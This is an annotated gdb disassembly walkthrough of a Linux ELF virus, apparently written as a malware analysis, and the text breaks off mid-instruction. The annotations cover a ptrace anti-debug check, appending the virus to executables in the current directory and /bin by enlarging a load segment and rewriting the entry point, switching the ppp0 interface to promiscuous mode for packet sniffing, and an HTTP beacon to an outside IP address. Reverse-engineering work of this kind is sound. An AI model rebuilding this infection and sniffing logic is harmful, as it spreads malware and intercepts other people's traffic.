(gdb) x/i 0x08048429 #start address 0x8048429: push %ebx 0x804842a: push %ecx 0x804842b: push %edx 0x804842c: push %esi 0x804842d: push %edi 0x804842e: jmp 0x804843b #jmp bottom 0x8048430: pop %eax 0x8048431: mov %eax,%ebx 0x8048433: sub $0x17,%ebx 0x8048439: jmp *%eax #jmp 0x8048440 0x804843b: call 0x8048430 0x8048440: call 0x8048a8f 0x8048445: pop %edi 0x8048446: pop %esi 0x8048447: pop %edx 0x8048448: pop %ecx 0x8048449: pop %ebx 0x804844a: mov $0x8048318,%eax 0x804844f: jmp *%eax #_start (gdb) x/i 0x8048a8f 0x8048a8f: mov $0x2,%eax #fork 0x8048a94: int $0x80 0x8048a96: cmp $0x0,%eax 0x8048a9b: jne 0x8048ad1 #parent 0x8048a9d: call 0x80486f9 #child PARENT (gdb) x/i 0x8048ad1 0x8048ad1: ret #returns to 0x8048445 CHILD (gdb) x/i 0x80486f9 0x80486f9: pusha 0x80486fa: xor %edx,%edx 0x80486fc: push %ebx 0x80486fd: push %ecx 0x80486fe: push %edx 0x80486ff: mov $0x1a,%eax #ptrace, attempt at thwarting debugging 0x8048704: mov $0x0,%ebx 0x8048709: mov $0x0,%ecx 0x804870e: mov $0x1,%edx 0x8048713: int $0x80 #ptrace(PTRACE_TRACEME,0,1); 0x8048715: pop %edx 0x8048716: pop %ecx 0x8048717: pop %ebx 0x8048718: cmp $0xffffffff,%eax #error checking 0x804871d: je 0x8048721 #calls a routine that does exit(0); 0x804871f: popa 0x8048720: ret #returns to 0x8048aa2 (gdb) x/i 0x8048aa2 0x8048aa2: mov %ebx,%eax 0x8048aa4: call 0x8048ad2 (gdb) x/i 0x8048ad2 0x8048ad2: push %eax 0x8048ad3: push %ebx 0x8048ad4: push %ecx 0x8048ad5: push %edx 0x8048ad6: push %esi 0x8048ad7: push %edi 0x8048ad8: push %eax 0x8048ad9: mov $0x2d,%eax #brk 0x8048ade: push %ebx 0x8048adf: mov $0x0,%ebx 0x8048ae4: int $0x80 0x8048ae6: pop %ebx 0x8048ae7: mov %eax,%esi 0x8048ae9: mov %eax,%ebx 0x8048aeb: add $0x10c,%ebx 0x8048af1: mov $0x2d,%eax #brk 0x8048af6: push %ebx 0x8048af7: mov %ebx,%ebx 0x8048af9: int $0x80 0x8048afb: pop %ebx 0x8048afc: cmp %ebx,%eax 0x8048afe: jne 0x8048b66 0x8048b00: movw $0x2e,(%esi) #"." 
0x8048b05: push %ebx 0x8048b06: push %ecx 0x8048b07: push %edx 0x8048b08: mov $0x5,%eax #open 0x8048b0d: mov %esi,%ebx 0x8048b0f: mov $0x0,%ecx 0x8048b14: mov $0x0,%edx 0x8048b19: int $0x80 #open(".",O_RDONLY) returns fd 0x8048b1b: pop %edx 0x8048b1c: pop %ecx 0x8048b1d: pop %ebx 0x8048b1e: mov %eax,%edi 0x8048b20: cmp $0xffffffff,%eax #error checking 0x8048b25: je 0x8048b5b 0x8048b27: xor %ecx,%ecx 0x8048b29: push %ebx 0x8048b2a: push %ecx 0x8048b2b: mov $0x59,%eax #readdir 0x8048b30: mov %edi,%ebx 0x8048b32: mov %esi,%ecx 0x8048b34: int $0x80 #readdir(fd,dirent buf, ); one entry per call 0x8048b36: pop %ecx 0x8048b37: pop %ebx 0x8048b38: cmp $0x0,%eax #0 means end of directory 0x8048b3d: ja 0x8048b44 #unsigned compare: a negative (-errno) return would also be taken as an entry 0x8048b3f: mov $0x1e,%ecx #forces loop exit after this pass 0x8048b44: pop %ebx 0x8048b45: push %ebx 0x8048b46: mov %esi,%eax 0x8048b48: add $0xa,%eax #d_name of the dirent just read 0x8048b4d: call 0x8048b6e #see 0x8048b6e below 0x8048b52: inc %ecx 0x8048b53: cmp $0x1e,%ecx #at most 0x1e entries 0x8048b59: jb 0x8048b29 0x8048b5b: mov $0x2d,%eax #brk error on open jumps here 0x8048b60: push %ebx 0x8048b61: mov %esi,%ebx 0x8048b63: int $0x80 0x8048b65: pop %ebx 0x8048b66: pop %eax 0x8048b67: pop %edi 0x8048b68: pop %esi 0x8048b69: pop %edx 0x8048b6a: pop %ecx 0x8048b6b: pop %ebx 0x8048b6c: pop %eax 0x8048b6d: ret 0x8048b6e: push %ebx #0x8048b4d calls here 0x8048b6f: push %ecx 0x8048b70: push %edx 0x8048b71: push %esi 0x8048b72: push %edi 0x8048b73: push %ebx 0x8048b74: mov %eax,%ecx 0x8048b76: mov $0x2d,%eax #brk 0x8048b7b: push %ebx 0x8048b7c: mov $0x0,%ebx 0x8048b81: int $0x80 0x8048b83: pop %ebx 0x8048b84: mov %eax,%esi 0x8048b86: add $0x1c,%eax 0x8048b8b: mov %eax,%ebx 0x8048b8d: mov $0x2d,%eax #brk 0x8048b92: push %ebx 0x8048b93: mov %ebx,%ebx 0x8048b95: int $0x80 0x8048b97: pop %ebx 0x8048b98: cmp %ebx,%eax 0x8048b9a: jne 0x8048ed3 0x8048ba0: push %ebx 0x8048ba1: push %ecx 0x8048ba2: mov $0x5,%eax #open 0x8048ba7: mov %ecx,%ebx 0x8048ba9: mov $0x2,%ecx 0x8048bae: int $0x80 #open(entry name from cwd,O_RDWR); 0x8048bb0: pop %ecx 0x8048bb1: pop %ebx 0x8048bb2: cmp $0xffffffff,%eax #error checking 0x8048bb7: jle 
0x8048ec8 0x8048bbd: mov %eax,0x4(%esi) #fd 0x8048bc0: push %ebx 0x8048bc1: push %ecx 0x8048bc2: push %edx 0x8048bc3: mov $0x13,%eax #lseek 0x8048bc8: mov 0x4(%esi),%ebx 0x8048bcb: mov $0x0,%ecx 0x8048bd0: mov $0x2,%edx 0x8048bd5: int $0x80 #lseek(fd,0,SEEK_END); 0x8048bd7: pop %edx 0x8048bd8: pop %ecx 0x8048bd9: pop %ebx 0x8048bda: cmp $0xffffffff,%eax #error checking 0x8048bdf: jle 0x8048ebc 0x8048be5: mov %eax,0x8(%esi) #file size 0x8048be8: push %ebx 0x8048be9: push %ecx 0x8048bea: push %edx 0x8048beb: mov $0x13,%eax #lseek 0x8048bf0: mov 0x4(%esi),%ebx 0x8048bf3: mov $0x0,%ecx 0x8048bf8: mov $0x0,%edx 0x8048bfd: int $0x80 #lseek(fd,0,SEEK_SET); 0x8048bff: pop %edx 0x8048c00: pop %ecx 0x8048c01: pop %ebx 0x8048c02: mov %esi,%ebx 0x8048c04: add $0x1c,%ebx 0x8048c0a: add 0x8(%esi),%ebx 0x8048c0d: mov $0x2d,%eax #brk 0x8048c12: push %ebx 0x8048c13: mov %ebx,%ebx 0x8048c15: int $0x80 0x8048c17: pop %ebx 0x8048c18: cmp %ebx,%eax 0x8048c1a: jne 0x8048ebc 0x8048c20: mov %esi,%ecx 0x8048c22: add $0x1c,%ecx 0x8048c28: push %ebx 0x8048c29: push %ecx 0x8048c2a: push %edx 0x8048c2b: mov $0x3,%eax #read 0x8048c30: mov 0x4(%esi),%ebx 0x8048c33: mov %ecx,%ecx 0x8048c35: mov 0x8(%esi),%edx 0x8048c38: int $0x80 #read(fd,buffer,sizeof(file)); return value not checked 0x8048c3a: pop %edx 0x8048c3b: pop %ecx 0x8048c3c: pop %ebx 0x8048c3d: cmpw $0x2,0x2c(%esi) #e_type == ET_EXEC (ELF header starts at esi+0x1c) 0x8048c43: jne 0x8048ebc 0x8048c49: movl $0x0,0xc(%esi) 0x8048c50: xor %ecx,%ecx 0x8048c52: mov %esi,%edi 0x8048c54: add $0x1c,%edi 0x8048c5a: add 0x38(%esi),%edi #e_phoff 0x8048c5d: mov $0x20,%eax #sizeof(Elf32_Phdr) 0x8048c62: mul %ecx,%eax 0x8048c64: add %eax,%edi #edi = program header ecx 0x8048c66: cmpl $0x0,0xc(%esi) 0x8048c6d: jne 0x8048cc0 0x8048c6f: cmpl $0x1,(%edi) #p_type == PT_LOAD 0x8048c75: jne 0x8048cc0 0x8048c77: cmpl $0x0,0x4(%edi) #p_offset == 0 0x8048c7e: jne 0x8048cc0 0x8048c80: mov 0x8(%edi),%eax 0x8048c83: add 0x10(%edi),%eax 0x8048c86: sub $0x1000,%eax 0x8048c8b: cmp 0x34(%esi),%eax #p_vaddr+p_filesz-0x1000 == e_entry: likely the already-infected marker 0x8048c8e: je 0x8048eda 0x8048c94: mov 0x4(%edi),%eax 0x8048c97: add 0x10(%edi),%eax 0x8048c9a: mov %eax,0xc(%esi) #insertion offset = p_offset+p_filesz 0x8048c9d: mov 0x8(%edi),%eax 
0x8048ca0: add 0x14(%edi),%eax 0x8048ca3: mov %eax,0x14(%esi) 0x8048ca6: addl $0x1000,0x10(%edi) 0x8048cad: addl $0x1000,0x14(%edi) 0x8048cb4: movl $0x7,0x18(%edi) 0x8048cbb: jmp 0x8048cd0 0x8048cc0: cmpl $0x0,0xc(%esi) 0x8048cc7: je 0x8048d1e 0x8048cc9: addl $0x1000,0x4(%edi) 0x8048cd0: mov %edi,%edx 0x8048cd2: sub %esi,%edx 0x8048cd4: sub $0x1c,%edx 0x8048cda: push %ebx 0x8048cdb: push %ecx 0x8048cdc: push %edx 0x8048cdd: mov $0x13,%eax #lseek 0x8048ce2: mov 0x4(%esi),%ebx 0x8048ce5: mov %edx,%ecx 0x8048ce7: mov $0x0,%edx 0x8048cec: int $0x80 #lseek(fd,,SEEK_SET); 0x8048cee: pop %edx 0x8048cef: pop %ecx 0x8048cf0: pop %ebx 0x8048cf1: cmp $0xffffffff,%eax #error checking 0x8048cf6: je 0x8048ebc 0x8048cfc: push %ebx 0x8048cfd: push %ecx 0x8048cfe: push %edx 0x8048cff: mov $0x4,%eax #write 0x8048d04: mov 0x4(%esi),%ebx 0x8048d07: mov %edi,%ecx 0x8048d09: mov $0x20,%edx 0x8048d0e: int $0x80 #write(fd,,32); 0x8048d10: pop %edx 0x8048d11: pop %ecx 0x8048d12: pop %ebx 0x8048d13: cmp $0x20,%eax #make sure write succeeded 0x8048d18: jne 0x8048ebc 0x8048d1e: inc %cx 0x8048d20: cmp 0x48(%esi),%cx 0x8048d24: jb 0x8048c52 0x8048d2a: push %ebx 0x8048d2b: push %ecx 0x8048d2c: push %edx 0x8048d2d: mov $0x13,%eax #lseek 0x8048d32: mov 0x4(%esi),%ebx 0x8048d35: mov 0xc(%esi),%ecx 0x8048d38: mov $0x0,%edx 0x8048d3d: int $0x80 #lseek( ,,SEEK_SET); 0x8048d3f: pop %edx 0x8048d40: pop %ecx 0x8048d41: pop %ebx 0x8048d42: cmp $0xffffffff,%eax #error checking 0x8048d47: je 0x8048ebc 0x8048d4d: pop %ecx 0x8048d4e: push %ecx 0x8048d4f: push %ebx 0x8048d50: push %ecx 0x8048d51: push %edx 0x8048d52: mov $0x4,%eax #write 0x8048d57: mov 0x4(%esi),%ebx 0x8048d5a: mov %ecx,%ecx 0x8048d5c: mov $0x1000,%edx 0x8048d61: int $0x80 #write( ,,4096); 0x8048d63: pop %edx 0x8048d64: pop %ecx 0x8048d65: pop %ebx 0x8048d66: cmp $0x1000,%eax #make sure write succeeded 0x8048d6b: jne 0x8048ebc 0x8048d71: mov %esi,%edi 0x8048d73: add $0x1c,%edi 0x8048d79: add 0xc(%esi),%edi 0x8048d7c: mov 0x8(%esi),%edx 
0x8048d7f: sub 0xc(%esi),%edx 0x8048d82: push %ebx 0x8048d83: push %ecx 0x8048d84: push %edx 0x8048d85: mov $0x4,%eax #write 0x8048d8a: mov 0x4(%esi),%ebx 0x8048d8d: mov %edi,%ecx 0x8048d8f: mov %edx,%edx 0x8048d91: int $0x80 0x8048d93: pop %edx 0x8048d94: pop %ecx 0x8048d95: pop %ebx 0x8048d96: mov 0x3c(%esi),%ecx 0x8048d99: add $0x1000,%ecx 0x8048d9f: push %ebx 0x8048da0: push %ecx 0x8048da1: push %edx 0x8048da2: mov $0x13,%eax #lseek 0x8048da7: mov 0x4(%esi),%ebx 0x8048daa: mov %ecx,%ecx 0x8048dac: mov $0x0,%edx 0x8048db1: int $0x80 #lseek(,,SEEK_SET); 0x8048db3: pop %edx 0x8048db4: pop %ecx 0x8048db5: pop %ebx 0x8048db6: cmp $0xffffffff,%eax #error checking 0x8048dbb: je 0x8048ebc 0x8048dc1: xor %ecx,%ecx 0x8048dc3: mov %esi,%edi 0x8048dc5: add $0x1c,%edi 0x8048dcb: add 0x3c(%esi),%edi 0x8048dce: mov $0x28,%eax 0x8048dd3: mul %ecx,%eax 0x8048dd5: add %eax,%edi 0x8048dd7: mov 0x10(%edi),%eax 0x8048dda: cmp 0xc(%esi),%eax 0x8048ddd: jb 0x8048de8 0x8048ddf: addl $0x1000,0x10(%edi) 0x8048de6: jmp 0x8048df7 0x8048de8: add 0xc(%edi),%eax 0x8048deb: cmp 0x14(%esi),%eax 0x8048dee: jne 0x8048df7 0x8048df0: addl $0x1000,0x14(%edi) 0x8048df7: push %ebx 0x8048df8: push %ecx 0x8048df9: push %edx 0x8048dfa: mov $0x4,%eax #write(,,40); 0x8048dff: mov 0x4(%esi),%ebx 0x8048e02: mov %edi,%ecx 0x8048e04: mov $0x28,%edx 0x8048e09: int $0x80 0x8048e0b: pop %edx 0x8048e0c: pop %ecx 0x8048e0d: pop %ebx 0x8048e0e: inc %cx 0x8048e10: cmp 0x4c(%esi),%cx 0x8048e14: jb 0x8048dc3 0x8048e16: mov 0xc(%esi),%ecx 0x8048e19: add $0x22,%ecx 0x8048e1f: push %ebx 0x8048e20: push %ecx 0x8048e21: push %edx 0x8048e22: mov $0x13,%eax 0x8048e27: mov 0x4(%esi),%ebx #lseek 0x8048e2a: mov %ecx,%ecx 0x8048e2c: mov $0x0,%edx 0x8048e31: int $0x80 #lseek(,,SEEK_SET); 0x8048e33: pop %edx 0x8048e34: pop %ecx 0x8048e35: pop %ebx 0x8048e36: cmp $0xffffffff,%eax #error checking 0x8048e3b: je 0x8048ebc 0x8048e41: mov %esi,%ecx 0x8048e43: add $0x34,%ecx 0x8048e49: push %ebx 0x8048e4a: push %ecx 0x8048e4b: push %edx 
0x8048e4c: mov $0x4,%eax #write 0x8048e51: mov 0x4(%esi),%ebx 0x8048e54: mov %ecx,%ecx 0x8048e56: mov $0x4,%edx 0x8048e5b: int $0x80 #write(,,4); 0x8048e5d: pop %edx 0x8048e5e: pop %ecx 0x8048e5f: pop %ebx 0x8048e60: cmp $0x4,%eax #error checking 0x8048e65: jne 0x8048ebc 0x8048e6b: addl $0x1000,0x3c(%esi) 0x8048e72: mov 0x14(%esi),%eax 0x8048e75: mov %eax,0x34(%esi) 0x8048e78: push %ebx 0x8048e79: push %ecx 0x8048e7a: push %edx 0x8048e7b: mov $0x13,%eax #lseek 0x8048e80: mov 0x4(%esi),%ebx 0x8048e83: mov $0x0,%ecx 0x8048e88: mov $0x0,%edx 0x8048e8d: int $0x80 #lseek(,0,SEEK_SET); 0x8048e8f: pop %edx 0x8048e90: pop %ecx 0x8048e91: pop %ebx 0x8048e92: cmp $0xffffffff,%eax #error checking 0x8048e97: je 0x8048ebc 0x8048e9d: mov %esi,%ecx 0x8048e9f: add $0x1c,%ecx 0x8048ea5: push %ebx 0x8048ea6: push %ecx 0x8048ea7: push %edx 0x8048ea8: mov $0x4,%eax #write 0x8048ead: mov 0x4(%esi),%ebx 0x8048eb0: mov %ecx,%ecx 0x8048eb2: mov $0x34,%edx 0x8048eb7: int $0x80 #write(,,52); 0x8048eb9: pop %edx 0x8048eba: pop %ecx 0x8048ebb: pop %ebx 0x8048ebc: mov $0x6,%eax #error jump here 0x8048ec1: push %ebx 0x8048ec2: mov 0x4(%esi),%ebx 0x8048ec5: int $0x80 #close 0x8048ec7: pop %ebx 0x8048ec8: mov $0x2d,%eax #brk 0x8048ecd: push %ebx 0x8048ece: mov %esi,%ebx 0x8048ed0: int $0x80 0x8048ed2: pop %ebx 0x8048ed3: pop %eax 0x8048ed4: pop %edi 0x8048ed5: pop %esi 0x8048ed6: pop %edx 0x8048ed7: pop %ecx 0x8048ed8: pop %ebx 0x8048ed9: ret #return to 0x8048aa9 #second time through return to 0x8048ac5 (gdb) x/i 0x8048aa9 0x8048aa9: push %ebx 0x8048aaa: push $0x0 0x8048aaf: push $0x6e69622f #"/bin" 0x8048ab4: mov %esp,%ebx 0x8048ab6: mov $0xc,%eax #chdir 0x8048abb: int $0x80 #chdir("/bin"); 0x8048abd: pop %ebx 0x8048abe: pop %ebx 0x8048abf: pop %eax 0x8048ac0: call 0x8048ad2 #see above, just did it for cwd 0x8048ac5: call 0x8048a2a (gdb) x/i 0x8048a2a 0x8048a2a: pusha 0x8048a2b: call 0x80486ac (gdb) x/i 0x80486ac 0x80486ac: push %ebx 0x80486ad: push %ecx 0x80486ae: push %edx 0x80486af: push %esi 
0x80486b0: push %edi 0x80486b1: jmp 0x80486be #jmp bottom 0x80486b3: pop %eax 0x80486b4: mov %eax,%ebx 0x80486b6: sub $0x17,%ebx 0x80486bc: jmp *%eax #jmp 0x80486c3 0x80486be: call 0x80486b3 #0x80486ac 0x80486c3: push %ebx 0x80486c4: push %ecx 0x80486c5: push %edx 0x80486c6: mov $0x7,%eax #waitpid 0x80486cb: mov $0x0,%ebx 0x80486d0: mov $0x0,%ecx 0x80486d5: mov $0x0,%edx 0x80486da: int $0x80 #waitpid(0,0,0); 0x80486dc: pop %edx 0x80486dd: pop %ecx 0x80486de: pop %ebx 0x80486df: mov %ebx,%ecx 0x80486e1: push %ebx 0x80486e2: push %ecx 0x80486e3: mov $0x30,%eax #signal 0x80486e8: mov $0x11,%ebx 0x80486ed: mov %ecx,%ecx 0x80486ef: int $0x80 #signal(SIGCHLD,0x80486ac); 0x80486f1: pop %ecx 0x80486f2: pop %ebx 0x80486f3: pop %edi 0x80486f4: pop %esi 0x80486f5: pop %edx 0x80486f6: pop %ecx 0x80486f7: pop %ebx 0x80486f8: ret #returns to 0x8048a30 (gdb) x/i 0x8048a30 0x8048a30: mov $0x2,%eax #fork 0x8048a35: int $0x80 0x8048a37: cmp $0x0,%eax 0x8048a3c: jne 0x8048a63 #parent (first child) 0x8048a3e: mov $0x2,%eax 0x8048a43: call 0x80485fd #child (child of first child) PARENT (first child) (gdb) x/i 0x8048a63 0x8048a63: mov $0x1,%eax 0x8048a68: call 0x80485fd (gdb) x/i 0x80485fd 0x80485fd: push %ebx 0x80485fe: push %ecx 0x80485ff: push %edx 0x8048600: push %esi 0x8048601: push %edi 0x8048602: lea 0x30(%eax),%edx 0x8048605: xor %edi,%edi 0x8048607: mov $0x32,%eax 0x804860c: call 0x8048499 (gdb) x/i 0x8048499 0x8048499: push %esi 0x804849a: push %ebx 0x804849b: push %eax 0x804849c: mov $0x2d,%eax #brk 0x80484a1: push %ebx 0x80484a2: mov $0x0,%ebx 0x80484a7: int $0x80 0x80484a9: pop %ebx 0x80484aa: mov %eax,%esi 0x80484ac: pop %ebx 0x80484ad: add %eax,%ebx 0x80484af: mov $0x2d,%eax #brk 0x80484b4: int $0x80 0x80484b6: cmp %ebx,%eax 0x80484b8: jne 0x80484c1 0x80484ba: mov %esi,%eax 0x80484bc: jmp 0x80484c8 0x80484c1: xor %eax,%eax 0x80484c3: jmp 0x80484c8 0x80484c8: pop %ebx 0x80484c9: pop %esi 0x80484ca: ret #returns to 0x8048611 #second time returns to 0x8048740 #third time 
returns to 0x80489e9 #fourth time returns to 0x8048898 (gdb) x/i 0x8048611 0x8048611: mov %eax,%esi 0x8048613: cmp $0x0,%eax 0x8048618: je 0x80486a4 0x804861e: jmp 0x8048623 #jmp bottom 0x8048620: pop %eax 0x8048621: jmp *%eax #jmp 0x8048628 0x8048623: call 0x8048620 0x8048628: sub $0x35,%eax 0x804862d: mov %eax,%ebx 0x804862f: mov %dl,0x8(%eax) #appends 1 and 2 to hdx ? 0x8048632: push %ebx 0x8048633: push %ecx 0x8048634: push %edx 0x8048635: mov $0x5,%eax #open 0x804863a: mov %ebx,%ebx 0x804863c: mov $0x42,%ecx 0x8048641: mov $0x0,%edx 0x8048646: int $0x80 #open("/dev/hdx" 0x8048648: pop %edx 0x8048649: pop %ecx 0x804864a: pop %ebx 0x804864b: cmp $0xffffffff,%eax #error checking 0x8048650: je 0x8048699 0x8048652: mov %eax,%edx 0x8048654: movw $0x1,(%esi) 0x8048659: movw $0x0,0x2(%esi) 0x804865f: movl $0x0,0x4(%esi) 0x8048666: movl $0x0,0x8(%esi) 0x804866d: mov $0x14,%eax #mknod 0x8048672: int $0x80 #mknod("/dev/hdx", fd); 0x8048674: mov %eax,0xc(%esi) 0x8048677: push %ebx 0x8048678: push %ecx 0x8048679: push %edx 0x804867a: mov $0x37,%eax #fcntl 0x804867f: mov %edx,%ebx 0x8048681: mov $0x6,%ecx 0x8048686: mov %esi,%edx 0x8048688: int $0x80 #fcntl(fd,F_SETLK, ); 0x804868a: pop %edx 0x804868b: pop %ecx 0x804868c: pop %ebx 0x804868d: cmp $0x0,%eax #error checking 0x8048692: jne 0x8048699 0x8048694: mov $0x1,%edi 0x8048699: mov $0x2d,%eax #brk 0x804869e: push %ebx 0x804869f: mov %esi,%ebx 0x80486a1: int $0x80 0x80486a3: pop %ebx 0x80486a4: mov %edi,%eax #it jumps to here 0x80486a6: pop %edi 0x80486a7: pop %esi 0x80486a8: pop %edx 0x80486a9: pop %ecx 0x80486aa: pop %ebx 0x80486ab: ret #returns to 0x8048623 #second time returns to 0x8048a6d 0x8048a6d: cmp $0x0,%eax 0x8048a72: je 0x8048a88 0x8048a74: jmp 0x8048a79 #jmp bottom 0x8048a76: pop %eax 0x8048a77: jmp *%eax #jmp to 0x8048a7e 0x8048a79: call 0x8048a76 0x8048a7e: sub $0x5e,%eax #"ppp0" 0x8048a83: call 0x80489d0 0x8048a88: mov $0x1,%eax #exit 0x8048a8d: int $0x80 (gdb) x/i 0x80489d0 0x80489d0: pusha 0x80489d1: 
call 0x804872f (gdb) x/i 0x804872f 0x804872f: push %ebx 0x8048730: push %ecx 0x8048731: push %edx 0x8048732: push %esi 0x8048733: push %edi 0x8048734: mov %eax,%edi 0x8048736: mov $0x20,%eax 0x804873b: call 0x8048499 #see above 0x8048740: cmp $0x0,%eax 0x8048745: je 0x80487c3 0x8048747: mov %eax,%esi 0x8048749: mov %edi,%eax 0x804874b: mov %esi,%ebx 0x804874d: mov $0x4,%ecx 0x8048752: call 0x80484f2 #copies 4 bytes ("ppp0") into the ifreq name 0x8048757: mov $0x2,%eax #PF_INET 0x804875c: mov $0xa,%ebx #SOCK_PACKET 0x8048761: mov $0x8,%ecx #EGP (for a SOCK_PACKET socket 8 is htons(ETH_P_IP), i.e. raw IPv4 frames, which matches the frame offsets used later) 0x8048766: call 0x8048538 #sniffing socket 0x804876b: mov %eax,%edi 0x804876d: cmp $0xffffffff,%eax #error checking for socketcall 0x8048772: je 0x80487b6 0x8048774: push %ebx 0x8048775: push %ecx 0x8048776: push %edx 0x8048777: mov $0x36,%eax #ioctl 0x804877c: mov %edi,%ebx 0x804877e: mov $0x8913,%ecx 0x8048783: mov %esi,%edx #ppp0 might get changed to eth0 0x8048785: int $0x80 #ioctl(fd,SIOCGIFFLAGS,"ppp0"); 0x8048787: pop %edx 0x8048788: pop %ecx 0x8048789: pop %ebx 0x804878a: cmp $0x0,%eax 0x804878f: jl 0x80487b6 #error checking 0x8048791: orw $0x100,0x10(%esi) #ifr_flags |= IFF_PROMISC: puts the interface into promiscuous mode 0x8048797: push %ebx 0x8048798: push %ecx 0x8048799: push %edx 0x804879a: mov $0x36,%eax #ioctl 0x804879f: mov %edi,%ebx 0x80487a1: mov $0x8914,%ecx 0x80487a6: mov %esi,%edx 0x80487a8: int $0x80 #ioctl(fd,SIOCSIFFLAGS,"ppp0"); 0x80487aa: pop %edx 0x80487ab: pop %ecx 0x80487ac: pop %ebx 0x80487ad: cmp $0x0,%eax #check for error 0x80487b2: jl 0x80487b6 0x80487b4: mov %edi,%eax 0x80487b6: push %eax #several errors jump here 0x80487b7: mov $0x2d,%eax #brk 0x80487bc: push %ebx 0x80487bd: mov %esi,%ebx 0x80487bf: int $0x80 0x80487c1: pop %ebx 0x80487c2: pop %eax 0x80487c3: pop %edi #jump made to here 0x80487c4: pop %esi 0x80487c5: pop %edx 0x80487c6: pop %ecx 0x80487c7: pop %ebx 0x80487c8: ret #return to 0x80489d6 (gdb) x/i 0x80484f2 0x80484f2: pusha 0x80484f3: xor %edx,%edx 0x80484f5: mov (%eax),%dl 0x80484f7: mov %dl,(%ebx) 0x80484f9: dec %ecx 0x80484fa: inc %eax 0x80484fb: inc %ebx 0x80484fc: cmp $0x0,%ecx 0x8048502: ja 
0x80484f5 #loop 0x8048504: popa 0x8048505: ret #return to 0x8048757 (gdb) x/i 0x8048538 0x8048538: push %ecx 0x8048539: push %ebx 0x804853a: push %eax 0x804853b: xor %eax,%eax 0x804853d: mov $0x66,%al #socketcall 0x804853f: xor %ebx,%ebx 0x8048541: mov $0x1,%bl 0x8048543: mov %esp,%ecx 0x8048545: int $0x80 #socketcall(SYS_SOCKET,args) 0x8048547: pop %ecx 0x8048548: pop %ebx 0x8048549: pop %ecx 0x804854a: ret #return to 0x804876b #second time return to 0x80488c8 (gdb) x/i 0x80489d6 0x80489d6: mov %eax,%edi 0x80489d8: cmp $0x0,%eax #check for error 0x80489dd: jl 0x8048a19 #calls exit 0x80489df: mov $0x400,%eax 0x80489e4: call 0x8048499 #see above 0x80489e9: mov %eax,%esi 0x80489eb: cmp $0x0,%eax #check for error 0x80489f0: je 0x8048a19 #calls exit 0x80489f2: call 0x804893d 0x80489f7: push %ebx 0x80489f8: push %ecx 0x80489f9: push %edx 0x80489fa: mov $0x3,%eax #read 0x80489ff: mov %edi,%ebx 0x8048a01: mov %esi,%ecx 0x8048a03: mov $0x400,%edx 0x8048a08: int $0x80 #read(fd,buf,1024); 0x8048a0a: pop %edx 0x8048a0b: pop %ecx 0x8048a0c: pop %ebx 0x8048a0d: mov %esi,%eax 0x8048a0f: call 0x80487cc 0x8048a14: jmp 0x80489f7 #loop 0x8048a19: mov $0x1,%eax 0x8048a1e: int $0x80 (gdb) x/i 0x804893d 0x804893d: pusha 0x804893e: mov $0x10,%eax 0x8048943: call 0x8048499 #see above 0x8048948: cmp $0x0,%eax #check for error 0x804894d: je 0x80489ce #popa ret 0x804894f: mov %eax,%esi 0x8048951: movw $0x2,(%esi) #AF_INET 0x8048956: movw $0x5000,0x2(%esi) #80 (htons) 0x804895c: movl $0x159b42cf,0x4(%esi) #207.66.155.21 0x8048963: mov $0x2,%eax 0x8048968: mov $0x1,%ebx 0x804896d: mov $0x6,%ecx 0x8048972: call 0x8048538 #see above 0x8048977: cmp $0xffffffff,%eax #check for error with socketcall 0x804897c: je 0x80489c3 0x804897e: mov %eax,%edi 0x8048980: mov %edi,%eax 0x8048982: mov %esi,%ebx 0x8048984: mov $0x10,%ecx 0x8048989: call 0x8048571 0x804898e: cmp $0xffffffff,%eax #check for error with socketcall 0x8048993: je 0x80489b8 0x8048995: xor %ebx,%ebx 0x8048997: jmp 0x804899c #jmp bottom 
0x8048999: pop %eax 0x804899a: jmp *%eax #jmp 0x80489a1 0x804899c: call 0x8048999 0x80489a1: sub $0x88,%eax 0x80489a6: mov %eax,%ecx #"GET /~telcom69/gov.php HTTP/1.0\r\n\r\n" 0x80489a8: call 0x80484cb #strlen-like: counts bytes until one equals %bl (ebx zeroed at 0x8048995) 0x80489ad: mov %eax,%edx 0x80489af: mov %edi,%ebx 0x80489b1: mov $0x4,%eax #write 0x80489b6: int $0x80 #write(sock,request,len); socket is closed right after, no response is read 0x80489b8: mov $0x6,%eax #close 0x80489bd: push %ebx 0x80489be: mov %edi,%ebx 0x80489c0: int $0x80 0x80489c2: pop %ebx 0x80489c3: mov $0x2d,%eax #brk 0x80489c8: push %ebx 0x80489c9: mov %esi,%ebx 0x80489cb: int $0x80 0x80489cd: pop %ebx 0x80489ce: popa 0x80489cf: ret #return to 0x80489f7 (gdb) x/i 0x80489c3 0x80489c3: mov $0x2d,%eax #brk 0x80489c8: push %ebx 0x80489c9: mov %esi,%ebx 0x80489cb: int $0x80 0x80489cd: pop %ebx 0x80489ce: popa 0x80489cf: ret #returns to 0x804897e (gdb) x/i 0x8048571 0x8048571: push %ecx 0x8048572: push %ebx 0x8048573: push %eax 0x8048574: xor %eax,%eax 0x8048576: mov $0x66,%al #socketcall 0x8048578: xor %ebx,%ebx 0x804857a: mov $0x3,%bl 0x804857c: mov %esp,%ecx 0x804857e: int $0x80 #socketcall(SYS_CONNECT,args); 0x8048580: pop %ecx 0x8048581: pop %ebx 0x8048582: pop %ecx 0x8048583: ret #returns to 0x804898e (gdb) x/i 0x80489b8 0x80489b8: mov $0x6,%eax #close 0x80489bd: push %ebx 0x80489be: mov %edi,%ebx 0x80489c0: int $0x80 0x80489c2: pop %ebx 0x80489c3: mov $0x2d,%eax #brk 0x80489c8: push %ebx 0x80489c9: mov %esi,%ebx 0x80489cb: int $0x80 0x80489cd: pop %ebx 0x80489ce: popa 0x80489cf: ret #returns to 0x8048995 (gdb) x/i 0x80484cb 0x80484cb: push %ebx 0x80484cc: push %ecx 0x80484cd: push %edx 0x80484ce: push %esi 0x80484cf: mov %eax,%esi 0x80484d1: xor %ecx,%ecx 0x80484d3: lea (%esi,%ecx,1),%edx 0x80484d6: inc %ecx 0x80484d7: cmp %bl,(%edx) 0x80484d9: jne 0x80484d3 #loop 0x80484db: mov %ecx,%eax 0x80484dd: dec %eax 0x80484de: pop %esi 0x80484df: pop %edx 0x80484e0: pop %ecx 0x80484e1: pop %ebx 0x80484e2: ret #returns to 0x80489ad (gdb) x/i 0x80487cc 0x80487cc: pusha 0x80487cd: mov %eax,%esi 0x80487cf: mov 0x17(%esi),%al 0x80487d2: cmp 
